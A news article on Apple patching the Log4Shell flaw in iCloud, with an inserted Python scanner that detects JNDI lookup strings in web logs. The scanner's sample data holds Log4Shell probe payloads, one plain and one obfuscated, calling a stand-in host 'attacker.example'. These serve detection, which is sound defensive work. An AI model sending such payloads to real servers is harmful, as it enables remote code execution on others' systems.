Apple has patched the Log4Shell iCloud vulnerability, which was revealed last week. A security hole in the open-source tool log4j put millions of apps at risk. Cybersecurity experts described the vulnerability as “the most critical security vulnerability in a decade.”
Log4j is an open-source logging tool widely used by both websites and apps. As reported on 9to5Mac:
A new exploit called “Log4Shell” has been giving security teams at large technology companies a headache. When exploited, the vulnerability lets hackers run malicious code on vulnerable servers, and it can reportedly affect platforms such as iCloud and Steam.
As detailed by security company LunaSec (via the Verge), the vulnerability was first found in log4j, an open-source library used by multiple apps and websites for logging – which is the process of keeping a list of performed activities in order to review them later for fixing bugs or other errors.
According to security researcher Marcus Hutchins, Log4Shell could affect millions of apps around the world as the log4j library is widely used by developers.
It’s extremely easy for an attacker to use the Log4Shell exploit.
To exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. Since applications routinely log a wide range of events — such as messages sent and received by users, or the details of system errors — the vulnerability is unusually easy to exploit and can be triggered in a variety of ways.
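The "special string of characters" the passage refers to is a Log4j lookup of the form `${jndi:...}`. As an added defensive example, not from the article or from any company it names, the following Python scanner flags log lines that carry such a lookup, first collapsing the nested `${lower:}`/`${upper:}`/`${...:-x}` lookups that are commonly used to hide it from naive string matching. The sample log lines and the `attacker.example` host are constructed for illustration.

```python
import re

# Constructed sample log lines (not from the article): one benign request,
# one plain JNDI lookup probe, and one that hides the lookup inside nested lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET /index.html HTTP/1.1" 200',
    '10.0.0.9 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${upper:l}dap://attacker.example/a}"',
]

# Innermost lookups that Log4j would replace with a literal:
#   ${lower:X} / ${upper:X}  -> case-changed X
#   ${anything:-X}           -> the default value X (e.g. ${::-j})
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# The lookup prefix that triggers the remote JNDI resolution.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups innermost first, the way Log4j's
    substitution would, so an obfuscated probe reads the same as a plain one."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break  # nothing left to unwrap
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan(lines):
    """Return the indexes of log lines that should be raised as alerts."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_LOG_LINES):
        print(f"ALERT line {idx}: {SAMPLE_LOG_LINES[idx]}")
```

Run against a web-server access log to triage probe traffic; the presence of the string shows an attempt, not that the backend actually ran a vulnerable Log4j version.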
Apple’s iCloud was one of the services that were vulnerable to the exploit, and Apple, Microsoft, and others quickly patched it.
According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, but that the same exploit no longer worked on December 11. The exploit doesn’t appear to have affected macOS.
The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend […]
CrowdStrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.
The Apache Software Foundation, which runs the project, rated it a 10 on its risk scale due to the ease with which it could be exploited and the widespread nature of the tool […] Amit Yoran, CEO of cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade.”